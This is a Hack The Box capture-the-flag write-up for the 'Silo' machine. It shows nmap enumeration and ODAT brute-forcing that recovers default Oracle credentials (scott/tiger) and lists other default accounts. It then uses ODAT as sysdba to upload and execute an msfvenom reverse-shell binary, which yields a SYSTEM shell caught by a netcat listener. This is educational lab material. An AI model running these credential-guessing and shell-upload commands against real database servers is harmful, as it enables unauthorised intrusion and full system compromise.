HTB - Silo

Silo

Getting Root:

1. Used ODAT (Oracle Database Attacking Tool) to enumerate the Oracle database server

2. Uploaded reverse shell with ODAT and got system

Tools Used:

odat (Oracle Database Attacking Tool)

Nmap

nmap -sC -sV -p- -oA nmap/Silo 10.10.10.82
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 18:19 EDT
Nmap scan report for 10.10.10.82
Host is up (0.13s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m25s, deviation: 0s, median: 2m25s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-10T23:17:51
|_  start_date: 2020-03-10T22:20:22

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3377.71 seconds

Enumeration

HTTP

From the headers we can see its an IIS server running version 8.5 and using ASP

curl -I http://10.10.10.82
HTTP/1.1 200 OK
Content-Length: 701
Content-Type: text/html
Last-Modified: Wed, 03 Jan 2018 00:36:17 GMT
Accept-Ranges: bytes
ETag: '1114bde2a84d31:0'
"Server: Microsoft-IIS/8.5"
"X-Powered-By: ASP.NET"
Date: Tue, 10 Mar 2020 22:29:07 GMT

Oracle

nmap --script oracle-* 10.10.10.82 -p 1521
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 21:44 EDT
Nmap scan report for silo (10.10.10.82)
Host is up (0.10s latency).

PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-sid-brute: 
|_  XE

Nmap done: 1 IP address (1 host up) scanned in 235.94 seconds

Using ODAT

ODAT: Oracle Database Attacking Tool

GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking ToolGitHub

Finding the SID

I did this with nmap ( see Enumeration above) but it can also be done with ODAT

Brute Forcing Creds

The GitHub repo has some default username and passwords files under a directory named accounts. The default file is accounts/accounts.txt

python3 odat.py passwordguesser -s 10.10.10.82 -d XE 
odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
[+] Valid credentials found: scott/tiger. Continue...                                                                                                                                         
100% |#######################################################################################################################################################################| Time: 00:17:00 
[+] Accounts found on 10.10.10.82:1521/XE: 
scott/tiger

ODAT found: scott/tiger

Because I don't know much about oracle databases, I googled the term "Kali Linux enumerate oracle databases" and I was able to find this link which shows the default usernames and passwords on oracle databases.

Pentesters Guide to Oracle HackingMedium

# username and passwords from the website I found.
dbsnmp/dbsnmp 
sys/change_on_install 
pcms_sys/pcms_sys 
wmsys/wmsys 
outln/outln 
scott/tiger

As you can see scott/tiger are simply default creds.

Getting a Shell

Uploading the reverse shell I created with msfvenon

# odat utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\Temp" shellie.exe /root/HackTheBox/Silo/files/shellie.exe 

[1] (10.10.10.82:1521): Put the /root/HackTheBox/Silo/files/shellie.exe local file in the C:\Temp folder like shellie.exe on the 10.10.10.82 server   
[+] The /root/HackTheBox/Silo/files/shellie.exe file was created on the C:\Temp directory on the 10.10.10.82 server like the shellie.exe file

Executing the file

# odat externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:\Temp" shellie.exe   

[1] (10.10.10.82:1521): Execute the shellie.exe command stored in the C:\Temp path

Got a shell as SYSTEM

# rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

System Info

Host Name:                 SILO
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00115-23036-AA976
Original Install Date:     12/31/2017, 11:01:23 PM
System Boot Time:          3/11/2020, 4:03:30 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 722 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,137 MB
Virtual Memory: In Use:    1,294 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 149 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894852
                           [05]: KB2903939
                           [06]: KB2911106
                           [07]: KB2919355
                           [08]: KB2919394
                           [09]: KB2928680
                           [10]: KB2934520
                           [11]: KB2938066
                           [12]: KB2954879
                           [13]: KB2966826
                           [14]: KB2966828
                           [15]: KB2967917
                           [16]: KB2968296
                           [17]: KB2972103
                           [18]: KB2973114
                           [19]: KB2973351
                           [20]: KB2989930
                           [21]: KB3000850
                           [22]: KB3003057
                           [23]: KB3004361
                           [24]: KB3004365
                           [25]: KB3012702
                           [26]: KB3013172
                           [27]: KB3013791
                           [28]: KB3014442
                           [29]: KB3019978
                           [30]: KB3021910
                           [31]: KB3022777
                           [32]: KB3023219
                           [33]: KB3023266
                           [34]: KB3024751
                           [35]: KB3024755
                           [36]: KB3029603
                           [37]: KB3030377
                           [38]: KB3030947
                           [39]: KB3033446
                           [40]: KB3035126
                           [41]: KB3036612
                           [42]: KB3037576
                           [43]: KB3037924
                           [44]: KB3038002
                           [45]: KB3042085
                           [46]: KB3043812
                           [47]: KB3044374
                           [48]: KB3044673
                           [49]: KB3045634
                           [50]: KB3045685
                           [51]: KB3045717
                           [52]: KB3045719
                           [53]: KB3045755
                           [54]: KB3045992
                           [55]: KB3045999
                           [56]: KB3046017
                           [57]: KB3046737
                           [58]: KB3048043
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB3054464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3055642
                           [66]: KB3059317
                           [67]: KB3060681
                           [68]: KB3060793
                           [69]: KB3061512
                           [70]: KB3063843
                           [71]: KB3071756
                           [72]: KB3072307
                           [73]: KB3074228
                           [74]: KB3074545
                           [75]: KB3075220
                           [76]: KB3077715
                           [77]: KB3078405
                           [78]: KB3078676
                           [79]: KB3080042
                           [80]: KB3080149
                           [81]: KB3082089
                           [82]: KB3084135
                           [83]: KB3086255
                           [84]: KB3087041
                           [85]: KB3087137
                           [86]: KB3091297
                           [87]: KB3092601
                           [88]: KB3092627
                           [89]: KB3094486
                           [90]: KB3095701
                           [91]: KB3097992
                           [92]: KB3099834
                           [93]: KB3100473
                           [94]: KB3103616
                           [95]: KB3103696
                           [96]: KB3103709
                           [97]: KB3109103
                           [98]: KB3109976
                           [99]: KB3110329
                           [100]: KB3115224
                           [101]: KB3121261
                           [102]: KB3121461
                           [103]: KB3122651
                           [104]: KB3123245
                           [105]: KB3126033
                           [106]: KB3126434
                           [107]: KB3126587
                           [108]: KB3127222
                           [109]: KB3128650
                           [110]: KB3133043
                           [111]: KB3133690
                           [112]: KB3134179
                           [113]: KB3134815
                           [114]: KB3137728
                           [115]: KB3138602
                           [116]: KB3139164
                           [117]: KB3139398
                           [118]: KB3139914
                           [119]: KB3140219
                           [120]: KB3140234
                           [121]: KB3145384
                           [122]: KB3145432
                           [123]: KB3146604
                           [124]: KB3146723
                           [125]: KB3146751
                           [126]: KB3147071
                           [127]: KB3153704
                           [128]: KB3155784
                           [129]: KB3156059
                           [130]: KB3159398
                           [131]: KB3161949
                           [132]: KB3161958
                           [133]: KB3162343
                           [134]: KB3169704
                           [135]: KB3172614
                           [136]: KB3172729
                           [137]: KB3173424
                           [138]: KB3175024
                           [139]: KB3178539
                           [140]: KB3179574
                           [141]: KB3186539
                           [142]: KB4033369
                           [143]: KB4033428
                           [144]: KB4040972
                           [145]: KB4040974
                           [146]: KB4040981
                           [147]: KB4041777
                           [148]: KB4054854
                           [149]: KB4054519
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.82
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.